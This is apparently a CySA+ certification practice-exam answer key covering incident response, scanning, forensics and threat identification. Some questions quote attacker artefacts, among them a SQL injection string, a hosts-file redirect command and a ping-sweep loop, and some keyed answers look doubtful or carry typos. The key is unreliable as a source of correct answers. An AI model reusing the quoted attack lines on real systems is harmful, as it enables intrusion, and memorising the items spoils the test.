CSO-001 (CYSA+)
A malicious user is reviewing the following output: root:~#ping 192.168.1.137 64 bytes from 192.168.2.1 icmp_seq=1 ttl=63 time=1.58 ms 64 bytes from 192.168.2.1 icmp_seq=2 ttl=63 time=1.45 ms root: ~# Based on the above output, which of the following is the device between the malicious user and the target? A. Proxy B. Access point C. Switch D. Hub
A. Proxy
Syed is developing a vulnerability scanner program for a large network of sensors that are used to monitor his company's transcontinental oil pipeline. What type of network is this? A. SCADA B. BAS C. SoC D. CAN
A. SCADA
A centralized tool for organizing security events and managing their response and resolution is known as: A. SIEM B. HIPS C. Syslog D. Wireshark
A. SIEM
An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirement? (Choose three.) A. 3DES B. AES C. IDEA D. PKCS E. PGP F. SSL/TLS G. TEMPEST
B. AES D. PKCS F. SSL/TLS
A security operations team was alerted to abnormal DNS activity coming from a user's machine. The team performed a forensic investigation and discovered a host had been compromised. Malicious code was using DNS as a tunnel to extract data from the client machine, which had been leaked and transferred to an unsecure public Internet site. Which of the following BEST describes the attack? A. Phishing B. Pharming C. Cache poisoning D. Data exfiltration
D. Data exfilitration
What is not a major category of security event indicator? A. Alerts B. Logs C. People D. Databases
D. Databases
Creating an isolated environment in order to test and observe the behavior of unknown software is also known as: A. sniffing B. hardening C. hashing D. sandboxing
D. Sandboxing
After scanning the main company's website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning: (see image Q-49a) The analyst reviews a snippet of the offending code: (see image Q-49b) Which of the following is the BEST course of action based on the above warning and code snippet? A. The analyst should implement a scanner exception for the false positive. B. The system administrator should disable SSL and implement TLS. C. The developer should review the code and implement a code fix. D. The organization should update the browser GPO to resolve the issue.
D. The organization should update the browser GPO to resolve the issue
A production web server is experiencing performance issues. Upon investigation, new unauthorized applications have been installed and suspicious traffic was sent through an unused port. Endpoint security is not detecting any malware or virus. Which of the following types of threats would this MOST likely be classified as? A. Advanced persistent threat B. Buffer overflow vulnerability C. Zero day D. Botnet
A. Advanced persistent threat
Which of the following best practices is used to identify areas in the network that may be vulnerable to penetration testing from known external sources? A. Blue team training exercises B. Technical control reviews C. White team training exercises D. Operational control reviews
A. Blue Team Training Exercises
What sanitization technique uses only logical techniques to remove data? A. Clear B. Degauss C. Destroy D. Purge
A. Clear
Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment? A. Place the malware on an isolated virtual server disconnected from the network. B. Place the malware in a virtual server that is running Windows and is connected to the network. C. Place the malware on a virtual server connected to a VLAN. D. Place the malware on a virtual server running SIFT and begin analysis.
A. Place the malware on an isolated virtual server disconnected from the network
What document typically contains high-level statements of management intent? A. Policy B. Standard C. Procedure D. Guideline
A. Policy
What type of document typically contains high-level statements of management intent? A. Policy B. Procedure C. Standard D. Guideline
A. Policy
A company discovers an unauthorized device accessing network resources through one of many network drops in a common area used by visitors.The company decides that it wants to quickly prevent unauthorized devices from accessing the network but policy prevents the company from making changes on every connecting client.Which of the following should the company implement? A. Port security B. WPA2 C. Mandatory Access Control D. Network Intrusion Prevention
A. Port Security
During which phase of the incident response process does an organization assemble an incident response toolkit? A. Preparation B. Detection and analysis C. Containment, eradication, and recovery D. Post-incident activity
A. Preparation
When does an organization assemble an incident response toolkit during the incident response process? A. Preparation B. Detection and analysis C. Containment, eradication, and recovery D. Post-incident activity
A. Preparation
A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot afford to purchase a data loss prevention system. Which of the following recommendations should the security analyst make to provide defense-in-depth against data loss?(Choose three.) A. Prevent users from accessing personal email and file-sharing sites via web proxy B. Prevent flash drives from connecting to USB ports using Group Policy C. Prevent users from copying data from workstation to workstation D. Prevent users from using roaming profiles when changing workstations E. Prevent Internet access on laptops unless connected to the network in the office or via VPN F. Prevent users from being able to use the copy and paste functions
A. Prevent users from accessing person email and file-sharing sites via web proxy B. Prevent flash drives from connection to USB ports using Group Policy E. Prevent Internet access on laptops unless connected to the network in the office or via VPN
A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data? A. Quarterly B. Yearly C. Bi-annually D. Monthly
A. Quarterly
Dion Training's security team recently discovered a bug in their software's code. The development team released a software patch to remove the vulnerability caused by the bug. What type of test should a software tester perform on the application to ensure that the application is still functioning properly after the patch is installed? A. Regression Testing B. User Acceptance Testing C. Penetration Testing D. Fuzzing
A. Regression Testing
A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host? A. Reserved MACs B. Host IPs C. DNS routing tables D. Gateway settings
A. Reserved MACs
An organization is attempting to harden its web servers and reduce the information that might be disclosed by potential attackers. A security analyst is reviewing vulnerability scan results from a recent web server scan.Portions of the scan results are shown below: Finding#5144322 First Time Detected 10 Nov 2015 09:00GMT-0600 Last Time Detected 10 Nov 2015 09:00GMT-0600 CVSS Base: 5 Access Path: https://myOrg.com/mailingList.htm Request: https://myOrg.com/mailingList.aspx?content=volunteer Response: C:\Documents\MarySmith\mailingList.pdf Which of the following lines indicates information disclosure about the host that needs to be remediated? A. Response: С:\Documents\MarySmith\mailingList.pdf B. Finding#5144322 C. First Time Detected 10 Nov 2015 09:00 GMT-0600 D. Access Path: http://myOrg.com/mailingList.htm E. Request: GET http://myOrg.com/mailingList.aspx?content=volunteer
A. Response:C:\Documents\MarySmith\mailingList.pdf
Creating a lessons learned report following an incident will help an analyst to communicate which of the following information? (Choose two.) A. Root cause analysis of the incident and the impact it had on the organization B. Outline of the detailed reverse engineering steps for management to review C. Performance data from the impacted servers and endpoints to report to management D. Enhancements to the policies and practices that will improve business responses E. List of IP addresses, applications, and assets
A. Root cause analysis of the incident and the impact it had on the organization D. Enhancements to the policies and practices that will improve business responses
You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and see the output:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- >echo 127.0.0.1 diontraining.com >> /etc/hosts-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following best describes what actions were performed by this line of code? A. Routed traffic destined for the diontraining.com domain to the localhost B. Attempted to overwrite the host file and deleted all data except this entry C. Routed traffic destined for the localhost to the diontraining.com domain D. Added the website to sustem's whitelist in the hosts files
A. Routed traffic destined for the diontraining.com domain to the localhost
Scan results identify critical Apache vulnerabilities on a company's web servers. A security analyst believes many of these results are false positives because the web environment mostly consists of Windows servers.Which of the following is the BEST method of verifying the scan results? A. Run a service discovery scan on the identified servers. B. Refer to the identified servers in the asset inventory. C. Perform a top-ports scan against the identified servers. D. Review logs of each host in the SIEM.
A. Run a service discovery scan on the identified servers
A web developer wants to protect their new web application from a man-in-the-middle attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies? A. Setting the secure attribute on the cookie B. Forcing the use of SSL for the web application C. Forcing the use of TLS for the web application D. Hashing the cookie value
A. Setting the secure attribute on the cookie
A computer has been infected with a virus and is sending out a beacon to command and control server through an unknown service. Which of the following should a security technician implement to drop the traffic going to the command and control server and still be able to identify the infected host through firewall logs? A. Sinkhole B. Block ports and services C. Patches D. Endpoint security
A. Sinkhole
You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails? A. The full email header from one of the spam messages B. Firewall logs showing the SMTP connections C. The SMTP auidit log from his company's email server D. Network flows for the DMZ containing the email servers
A. The full email header from one of the spam messages
An incident response report indicates a virus was introduced through a remote host that was connected to corporate resources. A cybersecurity analyst has been asked for a recommendation to solve this issue. Which of the following should be applied? A. MAC B. TAP C. NAC D. ACL
C. NAC
An analyst has noticed unusual activities in the SIEM to a .cn domain name. Which of the following should the analyst use to identify the content of the traffic? A. Log review B. Service discovery C. Packet capture D. DNS harvesting
C. Packet capture
Following a data compromise, a cybersecurity analyst noticed the following executed query:SELECT * from Users WHERE name = rick OR 1=1Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack?(Choose two.) A. Cookie encryption B. XSS attack C. Parameter validation D. Character blacklist E. Malicious code execution F. SQL injection
C. Parameter validation F. SQL Injection
A cybersecurity analyst is reviewing the report from their IDS and noticed that ports 1 to 1024 received SYN packets from a remote host. What likely caused this traffic? A. Remote host cannot find the right service port B. SYN Flood C. Port Scan D. UDP probe
C. Port Scan
The new Chief Technology Officer (CTO) is seeking recommendations for network monitoring services for the local intranet. The CTO would like the capability to monitor all traffic to and from the gateway, as well as the capability to block certain content. Which of the following recommendations would meet the needs of the organization? A. Recommend setup of IP filtering on both the internal and external interfaces of the gateway router. B. Recommend installation of an IDS on the internal interface and a firewall on the external interface of the gateway router. C. Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router. D. Recommend installation of an IPS on both the internal and external interfaces of the gateway router.
C. Recommend installation of a firewall on the internal interface and a NIDS on the external interface of the gateway router
Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application? A. File size and creation date B. Public key of the file C. MD5 or SHA1 hash digest of the file D. Private key of the file
C. MD5 or SHA1 hash digest of the file
A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website.During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine.Which of the following describes the type of attack the proxy has been legitimately programmed to perform? A. Transitive access B. Spoofing C. Man-in-the-middle D. Replay
C. Man-in-the-middle
A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following? A. Phishing B. Social engineering C. Man-in-the-middle D. Shoulder surfing
C. Man-in-the-middle
During the forensic a phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation? A. Session hijacking; network intrusion detection sensors B. Cross-site scripting; increased encryption key sizes C. Man-in-the-middle; well-controlled storage of private keys D. Rootkit; controlled storage of public keys
C. Man-in-the-middle; well-controlled storage of private keys
A software patch has been released to remove vulnerabilities from company's software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT? A. Fuzzing B. User acceptance testing C. Regression testing D. Penetration testing
C. Regression Testing
Which of the following commands would a security analyst use to make a copy of an image for forensics use? A. dd B. wget C. touch D. rm
A. dd
An organization uses Common Vulnerability Scoring System (CVSS) scores to prioritize remediation of vulnerabilities.Management wants to modify the priorities based on a difficulty factor so that vulnerabilities with lower CVSS scores may get a higher priority if they are easier to implement with less risk to system functionality. Management also wants to quantify the priority. Which of the following would achieve management's objective? A. (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 0.1 to 1.0 with 1.0 being easiest and lowest risk to implement B. (CVSS Score) * Difficulty = Priority Where Difficulty is a range from 1 to 5 with 1 being easiest and lowest risk to implement C. (CVSS Score) / Difficulty = Priority Where Difficulty is a range from 1 to 10 with 10 being easiest and lowest risk to implement D. ((CVSS Score) * 2) / Difficulty = Priority Where CVSS Score is weighted and Difficulty is a range from 1 to 5 with 5 being easiest and lowest risk to implement
A. (CVSS Score)*Difficulty=Priority Where Difficulty is a range from 0.1 to 1.0 with 1.0 being easiest and lowest risk to implement
A business-critical application is unable to support the requirements in the current password policy because it does not allow the use of special characters.Management does not want to accept the risk of a possible security incident due to weak password standards. Which of the following is an appropriate means to limit the risks related to the application? A. A compensating control B. Altering the password policy C. Creating new account management procedures D. Encrypting authentication traffic
A. A compensating control
A security professional is analyzing the results of a network utilization report. The report includes the following information: (See image Q-42) Which of the following servers needs further investigation? A. hr.dbprod.01 B. R&D.file.srvr.01 C. mrktg.file.srvr.02 D. web.srvr.03
A. hr.dbprod.01
A cybersecurity analyst is conducting packet analysis on the following: (see image Q-160) Which of the following is occurring in the given packet capture? A. ARP spoofing B. Broadcast storm C. Smurf attack D. Network enumeration E. Zero-day exploit
A. ARP spoofing
A security analyst has noticed that a particular server has consumed over 1TB of bandwidth over the course of the month. It has port 3333 open; however, there have not been any alerts or notices regarding the server or its activities. Which of the following did the analyst discover? A. APT B. DDoS C. Zero day D. False positive
A. ATP
After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company's network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company's information security team. How would you best classify this threat? A. Advanced persistent threat (APT) B. Insider threat C. Spear phishing D. Privilege escalation
A. Advanced persistent threat (APT)
A threat intelligence analyst who works for a financial services firm received this report: "There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called "LockMaster" by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector."The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Choose two.) A. Advise the firewall engineer to implement a block on the domain B. Visit the domain and begin a threat assessment C. Produce a threat intelligence message to be disseminated to the company D. Advise the security architects to enable full-disk encryption to protect the MBR E. Advise the security analysts to add an alert in the SIEM on the string "LockMaster" F. Format the MBR as a precaution
A. Advise the firewall engineer to implement a block on the domain D. Advise the security architects to enable full-disk encryption to protect the MBR
Which model of software development emphasizes individuals and interactions over processes and tools, customer collaboration over contract negotiation, and working software over comprehensive documentation? A. Agile B. Spiral C. RAD D. Waterfall
A. Agile
You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: -=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=- ZWNobygiSmFzb24gRGlvbiBjcmVhdGVkIHRoaXMgQ29tcFRJQSBDeVNBKyBwcmFjdGljZSBleGFtIHF1ZXN0aW9uLiBJZiB5b3UgZm91bmQgdGhpcyBxdWVzdGlvbiBpbiBzb21lb25lIGVsc2UncyBjb3Vyc2UsIHRoZXkgc3RvbGUgaXQhIik7= -=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=--=-=-=- Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed? A. Base64 B. XML C. SQL D. QR coding
A. Base64
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? A. Behavior B. Trend C. Anomaly D. Heuristic
A. Behavior
An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scans be performed, and the security team should remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scans, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices? A. CVSS B. SLA C. ITIL D. OpenVAS E. Qualys
A. CVSS
A cybersecurity analyst was asked to discover the hardware address of 30 networked assets. From a command line, which of the following tools would be used to provide ARP scanning and reflects the MOST efficient method for accomplishing the task? A. nmap B. tracert C. ping ""a D. nslookup
A. nmap
A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat.Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.) A. Cardholder data B. Intellectual property C. Personal health information D. Employee records E. Corporate financial data
A. Cardholder data C. Personal health information
An analyst finds that unpatched servers have undetected vulnerabilities because the vulnerability scanner does not have the latest set of signatures. Management directed the security team to have personnel update the scanners with the latest signatures at least 24 hours before conducting any scans, but the outcome is unchanged. Which of the following is the BEST logical control to address the failure? A. Configure a script to automatically update the scanning tool. B. Manually validate that the existing update is being performed. C. Test vulnerability remediation in a sandbox before deploying. D. Configure vulnerability scans to run in credentialed mode.
A. Configure a script to automatically update the scanning tool
During which incident response phase is the preservation of evidence performed? A. Containment, eradication, and recovery B. Post-incident activity C. Preparation D. Detection and analysis
A. Containment, eradication, and recovery
A company has several internal-only, web-based applications on the internal network. Remote employees are allowed to connect to the internal corporate network with a company-supplied VPN client. During a project to upgrade the internal application, contractors were hired to work on a database server and were given copies of the VPN client so they could work remotely. A week later, a security analyst discovered an internal web-server had been compromised by malware that originated from one of the contractor's laptops. Which of the following changes should be made to BEST counter the threat presented in this scenario? A. Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources. B. Deploy a web application firewall in the DMZ to stop Internet-based attacks on the web server. C. Deploy an application layer firewall with network access control lists at the perimeter, and then create alerts for suspicious Layer 7 traffic. D. Require the contractors to bring their laptops on site when accessing the internal network instead of using the VPN from a remote location. E. Implement NAC to check for updated proxy and location-based rules for PCs connecting to the internal network.
A. Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources
Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. Credentialed scan B. Non-credentialed scan C. Internal scan D. External scan
A. Credentialed scan
A security analyst is reviewing packet captures to determine the extent of success during an attacker's reconnaissance phase following a recent incident.The following is a hex and ASCII dump of one such packet: (see image Q-238) Which of the following BEST describes this packet? A. DNS BIND version request B. DNS over UDP standard query C. DNS over TCP server status query D. DNS zone transfer request
A. DNS BiND version request
After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company's computer. 16:26:42.943463 IP 192.168.1.10:25 > 10.38.219.20:3389 Flags [P.]. seq 1768:1901, ackl, win 511, options [nop,nop,TS cal 271989777 ecr 4752394941, length 133 Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services? A. DENY TCP ANY HOST 10.38.219.20 EQ 3389 B. DENY IP HOST 10.38.219.20 ANY EQ 25 C. DENY IP HOST192.168.1.10 HOST 10.38.219.20 EQ 3389 D. DENY TCP ANY HOST 192.168.1.10 EQ 25
A. Deny TCP Any Host 10.38.219.20 eq 3389
A cybersecurity analyst is hired to review the security measures implemented within the domain controllers of a company. Upon review, the cybersecurity analyst notices a brute force attack can be launched against domain controllers that run on a Windows platform. The first remediation step implemented by the cybersecurity analyst is to make the account passwords more complex. Which of the following is the NEXT remediation step the cybersecurity analyst needs to implement? A. Disable the ability to store a LAN manager hash. B. Deploy a vulnerability scanner tool. C. Install a different antivirus software. D. Perform more frequent port scanning. E. Move administrator accounts to a new security group.
A. Disable the ability to store LAN manager hash
A company has received the results of an external vulnerability scan from its approved scanning vendor. The company is required to remediate these vulnerabilities for clients within 72 hours of acknowledgement of the scan results.Which of the following contract breaches would result if this remediation is not provided for clients within the time frame? A. Service level agreement B. Regulatory compliance C. Memorandum of understanding D. Organizational governance
A. Service level agreement
A security analyst is conducting traffic analysis and observes an HTTP POST to the company's main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of? A. Exfiltration B. DoS C. Buffer overflow D. SQL injection
A. Exfilatration
During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to: (see image Q-144) Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server? A. FTP was explicitly allowed in Seq 8 of the ACL. B. FTP was allowed in Seq 10 of the ACL. C. FTP was allowed as being included in Seq 3 and Seq 4 of the ACL. D. FTP was allowed as being outbound from Seq 9 of the ACL.
A. FTP was explicitly allowed in Seq 8 of the ACL
As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being performed? A. Fuzzing B. Regression testing C. Stress testing D. Input validation
A. Fuzzing
A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Choose two.) A. Fuzzing B. Behavior modeling C. Static code analysis D. Prototyping phase E. Requirements phase F. Planning phase
A. Fuzzing D. Prototyping phase
You have just completed writing the scoping document for your next penetration test, which clearly defines what tools, techniques, and targets you intend to include during your assessment. Which of the following actions should you take next? A. Get leadership concurrence on the scoping document B. Provide a copy of the scoping document to local law enforcement C. Conduct a port scan of the target network D. Conduct passive fingerprinting on the target servers
A. Get leadership concurrence on the scoping document
An analyst has received unusual alerts on the SIEM dashboard. The analyst wants to get payloads that the hackers are sending toward the target systems without impacting the business operation. Which of the following should the analyst implement? A. Honeypot B. Jump box C. Sandboxing D. Virtualization
A. Honeypot
A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop's resources. Which of the following is the BEST course of actions to resolve the problem? A. Identify and remove malicious processes. B. Disable scheduled tasks. C. Suspend virus scan. D. Increase laptop memory. E. Ensure the laptop OS is properly patched.
A. Identify and remove malicious processes
A security analyst is attempting to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice? A. Install agents on the endpoints to perform the scan B. Provide each endpoint with vulnerability scanner credentials C. Encrypt all of the traffic between the scanner and the endpoint D. Deploy scanners with administrator privileges on each endpoint
A. Install agents on the endpoints to perform the scan
A server contains baseline images that are deployed to sensitive workstations on a regular basis. The images are evaluated once per month for patching and other fixes, but do not change otherwise. Which of the following controls should be put in place to secure the file server and ensure the images are not changed? A. Install and configure a file integrity monitoring tool on the server and allow updates to the images each month. B. Schedule vulnerability scans of the server at least once per month before the images are updated. C. Require the use of two-factor authentication for any administrator or user who needs to connect to the server. D. Install a honeypot to identify any attacks before the baseline images can be compromised. Reveal Solution Discussion
A. Install and configure a file integrity monitoring tool on the server and allow updates to the images each month
You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. Integer overflow attack B. Password spraying C. SQL injection D. Impersonation
A. Integer overflow attack
A cybersecurity analyst has been asked to follow a corporate process that will be used to manage vulnerabilities for an organization. The analyst notices the policy has not been updated in three years. Which of the following should the analyst check to ensure the policy is still accurate? A. Threat intelligence reports B. Technical constraints C. Corporate minutes D. Governing regulations
A. Threat intelligence reports
A security analyst has discovered that an outbound SFTP process is occurring at the same time of day for the past several days. At the time this was discovered, large amounts of business critical data were delivered. The authentication for this process occurred using a service account with proper credentials. The security analyst investigated the destination IP for this transfer and discovered that this new process is not documented in the change management log. Which of the following would be the BEST course of action for the analyst to take? A. Investigate a potential incident. B. Verify user permissions. C. Run a vulnerability scan. D. Verify SLA with cloud provider.
A. Investigate a potential incident
A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as "root" and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Choose two.) A. Log aggregation and analysis B. Software assurance C. Encryption D. Acceptable use policies E. Password complexity F. Network isolation and separation
A. Log aggregation and analysis D. Acceptable use policies
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? A. MSSP B. IaaS C. PaaS D. SaaS
A. MSSP
Various devices are connecting and authenticating to a single evil twin within the network. Which of the following are MOST likely being targeted? A. Mobile devices B. All endpoints C. VPNs D. Network infrastructure E. Wired SCADA devices
A. Mobile devices
An organization is experiencing degradation of critical services and availability of critical external resources. Which of the following can be used to investigate the issue? A. Netflow analysis B. Behavioral analysis C. Vulnerability analysis D. Risk analysis
A. NetFlow analysis
The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server.The director would like to work with the security team to implement a standardized way to design, build, and test web applications and the services that support them. Which of the following meets the criteria? A. OWASP B. SANS C. PHP D. Ajax
A. OWASP
Nmap scan results on a set of IP addresses returned one or more lines beginning with "cpe:/o:" followed by a company name, product name, and version. Which of the following would this string help an administrator to identify? A. Operating system B. Running services C. Installed software D. Installed hardware
A. Operating system
During a routine review of firewall logs, an analyst identified that an IP address from the organization's server subnet had been connecting during nighttime hours to a foreign IP address, and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident's impact assessment? A. PII of company employees and customers was exfiltrated. B. Raw financial information about the company was accessed. C. Forensic review of the server required fall-back on a less efficient service. D. IP addresses and other network-related configurations were exfiltrated. E. The local root password for the affected server was compromised.
A. PII of company employees and customers were exfiltrated
A reverse engineer was analyzing malware found on a retailer's network and found code extracting track data in memory. Which of the following threats did the engineer MOST likely uncover? A. POS malware B. Rootkit C. Key logger D. Ransomware
A. POS Malware
What type of monitoring is a network tap is typically associated with? A. Passive B. Active C. Router-based D. SNMP
A. Passive
A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included. (see image Q-177) Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues? A. Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary. B. Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion. C. Put ACLs in place to restrict traffic destined for random or non-default application ports. D. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.
A. Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary
As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Choose two.) A. Timing of the scan B. Contents of the executive summary report C. Excluded hosts D. Maintenance windows E. IPS configuration F. Incident response policies
A. Timing of the scan C. Excluded hosts
Law enforcement has contacted a corporation's legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach? A. Perform security awareness training about incident communication. B. Request all employees verbally commit to an NDA about the breach. C. Temporarily disable employee access to social media D. Have law enforcement meet with employees.
A. Perform security awareness training about incident communication
A cybersecurity analyst has received the laptop of a user who recently left the company. The analyst types "˜history' into the prompt, and sees this line of code in the latest bash history: >for i in seq 255; ping -c 1 192.168.0.$i; done This concerns the analyst because this subnet should not be known to users within the company. Which of the following describes what this code has done on the network? A. Performed a ping sweep of the Class C network. B. Performed a half open SYB scan on the network. C. Sent 255 ping packets to each host on the network. D. Sequentially sent an ICMP echo reply to the Class C network.
A. Performed a ping sweep of the Class C network
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place? A. Privilege escalation B. Phishing C. Session hijacking D. Social engineering
A. Privilege escalation
Which of the following BEST describes the offensive participants in a tabletop exercise? A. Red team B. Blue team C. System administrators D. Security analysts E. Operations team
A. Red Team
Which of the following countermeasures should the security administrator apply to MOST effectively mitigate Bootkit-level infections of the organization's workstation devices? A. Remove local administrator privileges. B. Configure a BIOS-level password on the device. C. Install a secondary virus protection application. D. Enforce a system state recovery after each device reboot.
A. Remove local administrator privileges
An analyst just completed a port scan and received the following results of open ports:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-TCP: 80 TCP: 110 TCP: 443 TCP: 1433 TCP: 3306 TCP: 3389 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Based on these scan results, which of the following services are NOT currently operating? A. SSH B. Web C. RDP D. Database
A. SSH
Which of the following are essential components within the rules of engagement for a penetration test? (Choose two.) A. Schedule B. Authorization C. List of system administrators D. Payment terms E. Business justification
A. Schedule B. Authorization
Which of the following is a feature of virtualization that can potentially create a single point of failure? A. Server consolidation B. Load balancing hypervisors C. Faster server provisioning D. Running multiple OS instances
A. Server consolidation
A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used toBEST protect the network in response to this alert? (Choose two.) A. Set up a sinkhole for that dynamic DNS domain to prevent communication. B. Isolate the infected endpoint to prevent the potential spread of malicious activity. C. Implement an internal honeypot to catch the malicious traffic and trace it. D. Perform a risk assessment and implement compensating controls. E. Ensure the IDS is active on the network segment where the endpoint resides.
A. Set up a sinkhole for that dynamic DNS domain to prevent communication B> Isolate the infected endpoint to prevent the potential spread of malicious activity
A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT? A. Start the change control process. B. Rescan to ensure the vulnerability still exists. C. Implement continuous monitoring. D. Begin the incident response process.
A. Start the change control process
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Static code analyzer B. Fuzzer C. Fault injector D. Decompiler
A. Static code analyzer
External users are reporting that a web application is slow and frequently times out when attempting to submit information. Which of the following software development best practices would have helped prevent this issue? A. Stress testing B. Regression testing C. Input validation D. Fuzzing
A. Stress Testing
A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted? A. Syslog B. Network mapping C. Firewall logs D. NIDS
A. Syslog
A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.) A. Tamper-proof seals B. Faraday cage C. Chain of custody form D. Drive eraser E. Write blockers F. Network tap G. Multimeter
A. Tamper-proof seals B. Faraday cage C. Chain of custody form
Which of the following policies BEST explains the purpose of a data ownership policy? A. The policy should describe the roles and responsibilities between users and managers, and the management of specific data types. B. The policy should establish the protocol for retaining information types based on regulatory or business needs. C. The policy should document practices that users must adhere to in order to access data on the corporate network or Internet. D. The policy should outline the organization's administration of accounts for authorized users to access the appropriate data.
A. Th policy should describe the roles and responsibilities between users and managers, and the management of specific data types
